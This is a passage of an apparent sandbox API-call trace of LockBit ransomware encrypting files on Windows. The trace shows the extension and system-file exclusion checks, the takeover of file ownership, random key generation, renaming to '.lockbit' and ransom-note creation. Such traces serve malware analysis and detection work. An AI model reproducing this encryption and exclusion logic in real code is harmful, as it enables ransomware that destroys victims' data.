dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0079.648] ReadFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.657] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\chapters-static.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\chapters-static.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0079.657] malloc (_Size=0xb8) returned 0x77d800 [0079.657] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xb8, FileInformationClass=0xa) returned 0x0 [0079.658] free (_Block=0x77d800) [0079.658] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\chapters-static.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl") returned 1 [0079.658] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Restore-My-Files.txt") returned 74 [0079.658] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.658] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x729fbb14, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x729fbb14, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4aba6851, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x8df12, dwReserved0=0x0, dwReserved1=0x0, cFileName="content-background.png", cAlternateFileName="")) returned 1 [0079.658] lstrcmpiW (lpString1=".", lpString2="content-background.png") returned -1 [0079.658] lstrcmpiW (lpString1="..", lpString2="content-background.png") returned -1 [0079.658] PathFindExtensionW (pszPath="content-background.png") returned=".png" [0079.658] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0079.658] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0079.658] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0079.658] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0079.658] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0079.658] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0079.658] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0079.658] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0079.658] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0079.658] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0079.659] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0079.659] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0079.659] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0079.659] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0079.659] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0079.659] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0079.659] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0079.659] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0079.659] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0079.659] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0079.659] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0079.659] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0079.659] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0079.659] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0079.659] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0079.659] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0079.659] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0079.659] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0079.659] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0079.659] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0079.659] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0079.660] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0079.660] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0079.660] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0079.660] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0079.660] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0079.660] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0079.660] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0079.660] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0079.660] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0079.660] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0079.660] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0079.660] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0079.660] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0079.660] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0079.660] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0079.660] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0079.661] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="content-background.png") returned 1 [0079.661] lstrcmpiW (lpString1="ntldr", lpString2="content-background.png") returned 1 [0079.661] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="content-background.png") returned 1 [0079.661] lstrcmpiW (lpString1="bootsect.bak", lpString2="content-background.png") returned -1 [0079.661] lstrcmpiW (lpString1="autorun.inf", lpString2="content-background.png") returned -1 [0079.661] lstrcmpiW (lpString1="thumbs.db", lpString2="content-background.png") returned 1 [0079.661] lstrcmpiW (lpString1="iconcache.db", lpString2="content-background.png") returned 1 [0079.661] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\") returned="" [0079.661] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-background.png") returned=".png" [0079.661] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0079.661] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0079.661] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0079.661] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0079.661] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0079.661] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0079.661] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0079.661] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0079.661] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0079.661] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0079.661] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0079.662] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0079.662] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0079.662] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0079.662] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0079.662] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0079.662] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0079.662] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0079.662] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0079.662] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0079.662] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0079.662] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0079.662] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0079.662] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0079.662] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0079.662] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0079.662] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0079.662] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0079.662] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-background.png.lockbit") returned 84 [0079.662] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\content-background.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.663] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0079.663] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0079.663] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0079.663] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0079.664] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0079.664] RtlFreeAnsiString (AnsiString="\\") [0079.664] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3ac) returned 0x0 [0079.664] malloc (_Size=0x200) returned 0x77d800 [0079.664] NtQueryInformationToken (in: TokenHandle=0x3ac, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0079.664] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.664] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.664] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-background.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.665] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-background.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.665] CloseHandle (hObject=0x3ac) returned 1 [0079.665] free (_Block=0x77d800) [0079.665] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\content-background.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0079.665] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0079.665] malloc (_Size=0x40068) returned 0x3d70048 [0079.665] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=581394) returned 1 [0079.665] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.666] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.666] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0079.666] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.666] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.666] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0079.666] ReadFile (in: hFile=0x3ac, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0079.671] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-background.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-background.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0079.671] malloc (_Size=0xbe) returned 0x77d800 [0079.671] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xbe, FileInformationClass=0xa) returned 0x0 [0079.672] free (_Block=0x77d800) [0079.672] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-background.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl") returned 1 [0079.672] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Restore-My-Files.txt") returned 74 [0079.672] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.672] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72a47dce, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72a47dce, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4b362f69, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="content-foreground.png", cAlternateFileName="")) returned 1 [0079.672] lstrcmpiW (lpString1=".", lpString2="content-foreground.png") returned -1 [0079.672] lstrcmpiW (lpString1="..", lpString2="content-foreground.png") returned -1 [0079.672] PathFindExtensionW (pszPath="content-foreground.png") returned=".png" [0079.672] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0079.672] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0079.672] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0079.672] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0079.672] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0079.672] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0079.672] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0079.672] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0079.673] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0079.673] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0079.673] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0079.673] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0079.673] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0079.673] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0079.673] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0079.673] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0079.673] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0079.673] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0079.673] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0079.673] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0079.673] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0079.673] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0079.673] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0079.673] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0079.673] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0079.673] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0079.673] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0079.673] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0079.673] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0079.673] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0079.674] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0079.674] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0079.674] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0079.674] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0079.674] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0079.674] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0079.674] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0079.674] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0079.674] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0079.674] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0079.674] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0079.674] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0079.674] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0079.674] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0079.674] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0079.674] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0079.674] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0079.674] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="content-foreground.png") returned 1 [0079.674] lstrcmpiW (lpString1="ntldr", lpString2="content-foreground.png") returned 1 [0079.674] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="content-foreground.png") returned 1 [0079.675] lstrcmpiW (lpString1="bootsect.bak", lpString2="content-foreground.png") returned -1 [0079.675] lstrcmpiW (lpString1="autorun.inf", lpString2="content-foreground.png") returned -1 [0079.675] lstrcmpiW (lpString1="thumbs.db", lpString2="content-foreground.png") returned 1 [0079.675] lstrcmpiW (lpString1="iconcache.db", lpString2="content-foreground.png") returned 1 [0079.675] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\") returned="" [0079.675] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-foreground.png") returned=".png" [0079.675] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0079.675] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0079.675] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0079.675] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0079.675] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0079.675] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0079.675] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0079.675] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0079.675] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0079.675] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0079.675] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0079.675] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0079.675] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0079.675] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0079.676] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0079.676] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0079.676] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0079.676] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0079.676] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0079.676] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0079.676] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0079.676] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0079.676] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0079.676] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0079.676] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0079.676] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0079.676] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0079.676] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0079.676] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-foreground.png.lockbit") returned 84 [0079.676] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-foreground.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\content-foreground.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.677] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0079.677] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0079.677] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0079.677] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0079.678] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0079.678] RtlFreeAnsiString (AnsiString="\\") [0079.678] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3a0) returned 0x0 [0079.678] malloc (_Size=0x200) returned 0x77d800 [0079.678] NtQueryInformationToken (in: TokenHandle=0x3a0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0079.678] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.678] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.678] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-foreground.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.678] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-foreground.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.679] CloseHandle (hObject=0x3a0) returned 1 [0079.679] free (_Block=0x77d800) [0079.679] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-foreground.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\content-foreground.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3a0 [0079.679] CreateIoCompletionPort (FileHandle=0x3a0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0079.679] malloc (_Size=0x40068) returned 0x1ff1e60 [0079.679] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=49904) returned 1 [0079.679] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.680] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.680] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0079.680] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.680] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.680] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0079.680] ReadFile (in: hFile=0x3a0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0079.685] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-foreground.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-foreground.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0079.685] malloc (_Size=0xbe) returned 0x77d800 [0079.685] NtSetInformationFile (FileHandle=0x3a0, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xbe, FileInformationClass=0xa) returned 0x0 [0079.686] free (_Block=0x77d800) [0079.686] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-foreground.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl") returned 1 [0079.686] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Restore-My-Files.txt") returned 74 [0079.686] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.686] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72a6df2b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72a6df2b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4b362f69, 